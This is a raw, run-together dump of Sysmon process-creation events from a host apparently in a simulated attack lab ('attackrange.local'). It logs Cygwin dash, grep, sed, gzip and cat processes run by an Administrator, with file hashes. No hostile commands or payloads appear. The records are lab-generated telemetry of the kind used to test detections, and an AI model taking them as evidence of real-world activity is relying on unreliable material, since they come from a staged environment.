14:55:57.041{A8622C2F-53FD-6078-1E0A-00000000AE01}4344C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FD-6078-1B0A-00000000AE01}6084C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051491Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.041{A8622C2F-53FD-6078-1D0A-00000000AE01}1140C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051472Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.033{A8622C2F-53FD-6078-1C0A-00000000AE01}5852C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FD-6078-1A0A-00000000AE01}1496C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051471Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.033{A8622C2F-53FD-6078-1B0A-00000000AE01}6084C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051459Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.026{A8622C2F-53FD-6078-1A0A-00000000AE01}1496C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051447Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.018{A8622C2F-53FD-6078-190A-00000000AE01}1476C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FD-6078-180A-00000000AE01}3156C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051437Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.011{A8622C2F-53FD-6078-180A-00000000AE01}3156C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051425Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.003{A8622C2F-53FD-6078-170A-00000000AE01}2508C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FC-6078-150A-00000000AE01}5964C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051408Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.996{A8622C2F-53FC-6078-160A-00000000AE01}2084C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FC-6078-130A-00000000AE01}1800C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051405Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.995{A8622C2F-53FC-6078-150A-00000000AE01}5964C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051387Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.988{A8622C2F-53FC-6078-140A-00000000AE01}6336C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FC-6078-120A-00000000AE01}6064C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051385Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.988{A8622C2F-53FC-6078-130A-00000000AE01}1800C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051373Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.981{A8622C2F-53FC-6078-120A-00000000AE01}6064C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051361Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.973{A8622C2F-53FC-6078-110A-00000000AE01}6032C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FC-6078-100A-00000000AE01}4160C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051351Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.966{A8622C2F-53FC-6078-100A-00000000AE01}4160C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051339Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.957{A8622C2F-53FC-6078-0F0A-00000000AE01}6076C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FC-6078-0D0A-00000000AE01}5860C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051320Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.949{A8622C2F-53FC-6078-0D0A-00000000AE01}5860C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051319Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.949{A8622C2F-53FC-6078-0E0A-00000000AE01}5116C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FC-6078-0B0A-00000000AE01}6364C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051300Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.942{A8622C2F-53FC-6078-0C0A-00000000AE01}5640C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FC-6078-0A0A-00000000AE01}4412C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051299Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.942{A8622C2F-53FC-6078-0B0A-00000000AE01}6364C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051287Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.935{A8622C2F-53FC-6078-0A0A-00000000AE01}4412C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051275Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.927{A8622C2F-53FC-6078-090A-00000000AE01}6652C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FC-6078-080A-00000000AE01}5396C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051265Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.920{A8622C2F-53FC-6078-080A-00000000AE01}5396C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051253Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.911{A8622C2F-53FC-6078-070A-00000000AE01}6268C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FC-6078-050A-00000000AE01}1496C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051235Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.903{A8622C2F-53FC-6078-060A-00000000AE01}5832C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FC-6078-030A-00000000AE01}3156C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051233Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.903{A8622C2F-53FC-6078-050A-00000000AE01}1496C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051214Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.896{A8622C2F-53FC-6078-040A-00000000AE01}2508C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FC-6078-020A-00000000AE01}612C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051213Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.896{A8622C2F-53FC-6078-030A-00000000AE01}3156C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051201Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.889{A8622C2F-53FC-6078-020A-00000000AE01}612C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051189Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.881{A8622C2F-53FC-6078-010A-00000000AE01}6416C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FC-6078-000A-00000000AE01}5220C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051179Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.874{A8622C2F-53FC-6078-000A-00000000AE01}5220C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051167Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.865{A8622C2F-53FC-6078-FF09-00000000AE01}3912C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FC-6078-FD09-00000000AE01}6064C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051148Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.857{A8622C2F-53FC-6078-FE09-00000000AE01}4364C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FC-6078-FB09-00000000AE01}4160C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051147Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.857{A8622C2F-53FC-6078-FD09-00000000AE01}6064C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051128Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.850{A8622C2F-53FC-6078-FC09-00000000AE01}3136C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FC-6078-FA09-00000000AE01}1348C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051127Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.850{A8622C2F-53FC-6078-FB09-00000000AE01}4160C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051115Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.843{A8622C2F-53FC-6078-FA09-00000000AE01}1348C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051103Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.835{A8622C2F-53FC-6078-F909-00000000AE01}3008C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FC-6078-F809-00000000AE01}5108C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051093Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.828{A8622C2F-53FC-6078-F809-00000000AE01}5108C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051081Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.819{A8622C2F-53FC-6078-F709-00000000AE01}4568C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FC-6078-F509-00000000AE01}4412C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051063Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.811{A8622C2F-53FC-6078-F609-00000000AE01}5952C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FC-6078-F309-00000000AE01}5396C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051061Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.811{A8622C2F-53FC-6078-F509-00000000AE01}4412C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000051042Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 